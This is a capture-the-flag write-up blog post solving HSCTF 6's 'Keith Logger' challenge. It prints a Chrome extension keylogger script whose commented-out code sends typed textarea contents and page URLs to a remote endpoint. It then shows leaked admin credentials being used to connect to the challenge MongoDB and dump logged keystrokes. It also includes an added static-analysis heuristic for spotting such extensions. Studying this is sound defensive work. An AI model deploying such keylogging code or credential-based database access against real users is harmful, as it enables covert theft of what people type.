こんとろーるしーこんとろーるぶい

A blog where I paste whatever I hammered out on the keyboard over the weekend

HSCTF 6 Writeup - Keith Logger

Question

Keith is up to some evil stuff! Can you figure out what he's doing and find the flag?

Solution

The attached file is a Chrome Extension with the .crx extension.
Opening it with 7zip shows that it contains content.js.

var timeout_textarea;
var xhr_textarea;

$("textarea").on("keyup", function() {
  if (timeout_textarea) {
    clearTimeout(timeout_textarea);
  }

  if (xhr_textarea) {
    xhr_textarea.abort();
  }

  timeout_textarea = setTimeout(function() {
    var xhr = new XMLHttpRequest();
    /*
    xhr.open(
      "GET",
      "https://keith-logger.web.chal.hsctf.com/api/record?text=" +
        encodeURIComponent($("textarea").val()) +
        "&url=" + encodeURIComponent(window.location.href),
      true
    );*/


    // send a request to admin whenever something is logged, not needed anymore after testing
    /*
    xhr.open(
      "GET",
      "https://keith-logger.web.chal.hsctf.com/api/admin",
      true
    );*/

    xhr.send();
  }, 2000);
});
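
When reviewing an extension like this, note that both endpoints sit inside comments, so a check that only looks at live code would miss them. The following is an added example (not part of the challenge files or the original post): a Node.js heuristic that flags keyboard-event handlers paired with network calls and lists URLs separately for live code and comments. The function name `triage`, the regexes and the shortened `SAMPLE` are assumptions constructed for illustration.

```javascript
// Added example: static triage of an extension content script (Node.js, no dependencies).
// SAMPLE is constructed: a shortened copy of the content.js shown above.
const SAMPLE = `
$("textarea").on("keyup", function() {
  timeout_textarea = setTimeout(function() {
    var xhr = new XMLHttpRequest();
    /*
    xhr.open("GET",
      "https://keith-logger.web.chal.hsctf.com/api/record?text=" +
        encodeURIComponent($("textarea").val()) +
        "&url=" + encodeURIComponent(window.location.href), true);*/
    // send a request to admin whenever something is logged
    /*
    xhr.open("GET", "https://keith-logger.web.chal.hsctf.com/api/admin", true);*/
    xhr.send();
  }, 2000);
});`;

const KEY_EVENTS = /\.(?:on|addEventListener)\(\s*["'](keyup|keydown|keypress|input)["']/g;
const INPUT_READS = /\.val\(\)|\.value\b/;
const NET_SINKS = /\bXMLHttpRequest\b|\bfetch\s*\(|\bsendBeacon\s*\(|\bWebSocket\s*\(/g;
const URLS = /https?:\/\/[^\s"'`)<>]+/g;
// Heuristic: block comments, plus line comments that begin a line
// (so the "//" inside "https://" in a string is not treated as a comment).
const COMMENTS = /\/\*[\s\S]*?\*\/|^[ \t]*\/\/[^\n]*/gm;

function triage(source) {
  const commented = (source.match(COMMENTS) || []).join("\n");
  const live = source.replace(COMMENTS, "");
  const uniq = (text, re) => [...new Set(text.match(re) || [])];
  const report = {
    // Keyboard/input handlers registered in code that actually runs.
    keyEvents: [...new Set([...live.matchAll(KEY_EVENTS)].map(m => m[1]))],
    // Field reads anywhere, including disabled code that could be re-enabled.
    readsInput: INPUT_READS.test(source),
    netSinks: uniq(live, NET_SINKS),
    liveUrls: uniq(live, URLS),
    commentedUrls: uniq(commented, URLS),
  };
  // Flag for manual review: key capture and a network sink in the same script.
  report.suspicious = report.keyEvents.length > 0 && report.netSinks.length > 0;
  return report;
}

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```
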

The script contains URLs, so let's try accessing them.

root@kali:~# curl "https://keith-logger.web.chal.hsctf.com/api/record?text=aaa&url=bbb"
{'text': 'aaa', 'url': 'bbb', 'time': '13:47:05.441928'}


root@kali:~# curl "https://keith-logger.web.chal.hsctf.com/api/admin"
didn't have time to implement this page yet. use admin:keithkeithkeith@keith-logger-mongodb.web.chal.hsctf.com:27017 for now

Yet another URL turned up.

root@kali:~# curl "keith-logger-mongodb.web.chal.hsctf.com:27017"
It looks like you are trying to access MongoDB over HTTP on the native driver port.

Connecting with a MongoDB client looks like the way to go.

The mongo command is required.
On Kali Linux, it can be installed by following the procedure below.

docs.mongodb.com

Connect, then list the databases and collections.

root@kali:~# mongo keith-logger-mongodb.web.chal.hsctf.com:27017 -u admin -p keithkeithkeith --authenticationDatabase admin
MongoDB shell version v4.0.10
connecting to: mongodb://keith-logger-mongodb.web.chal.hsctf.com:27017/test?authSource=admin&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("ea9498a4-faa7-4a40-9613-9fc71f6c94f2") }
MongoDB server version: 4.0.10

> show dbs
database  0.000GB

> use database
switched to db database

> show collections
collection

So there is a database named database that contains a collection named collection.

> db.collection.find()
{ "_id" : ObjectId("5cf0512d464d9fe1d9915fbd"), "text" : "are kitties cool", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:54:53.925045" }
{ "_id" : ObjectId("5cf051a95501f2901a915fbd"), "text" : "because i think they are", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:56:57.974856" }
{ "_id" : ObjectId("5cf051b3464d9fe1d9915fbe"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:57:07.295378" }
{ "_id" : ObjectId("5cf0520b464d9fe1d9915fbf"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:35.030635" }
{ "_id" : ObjectId("5cf05212464d9fe1d9915fc0"), "text" : "if you're looking for the flag", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:42.170470" }
{ "_id" : ObjectId("5cf0521b5501f2901a915fbe"), "text" : "it's hsctf{watch_out_for_keyloggers}", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:51.359556" }

Got the flag.
hsctf{watch_out_for_keyloggers}